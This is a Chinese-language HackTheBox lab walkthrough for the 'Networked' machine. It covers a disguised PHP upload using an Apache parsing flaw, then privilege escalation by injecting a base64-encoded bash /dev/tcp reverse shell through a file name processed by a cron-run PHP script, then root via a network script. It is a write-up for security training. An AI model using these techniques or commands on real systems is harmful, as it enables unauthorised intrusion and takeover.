Networked - HackTheBox

nmap扫描



访问80端口

扫描目录

uploads目录下没什么信息

backup目录下疑似一个备份文件


解压之后发现几个php文件,访问看看


应该是个文件上传,看看源码

还是个白名单上传,check_file_type函数在lib.php里面

会检测文件的mime类型
前面nmap扫描的时候,80端口扫描出来的中间件为apache 2.4.6版本,该版本有解析漏洞,此时我们只需要上传一个test.php.png的文件,内部包含有恶意代码,利用解析漏洞进行触发
在文件头部添加GIF89a,伪装图片格式

反弹shell的php文件

成功上传,监听一下,在访问上传文件


提权

提权讲究多样性,就不继续用pkexec了

在guly家目录下发现一个疑似定时任务的文件


该文件会每三分钟以php执行check_attack.php

这个文件是删除临时文件的作用,但可以将文件名与rm -f命令进行一个组合,造成反弹shell

将反弹命令进行一个base64编码

;echo -n "L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMvNzc3NyAwPiYxJw=="|base64 -d|bash
此时只需要在uploads目录下创建一个名字为这个的文件即可


继续提权


这个大概意思是说,这玩意会创建一个叫guly0的网卡,如果执行这个.sh文件,则会要求输入创建的信息,如果在第一行输入xxxx /bin/bash,那么下面无论是什么内容,都会执行/bin/bash,造成提权
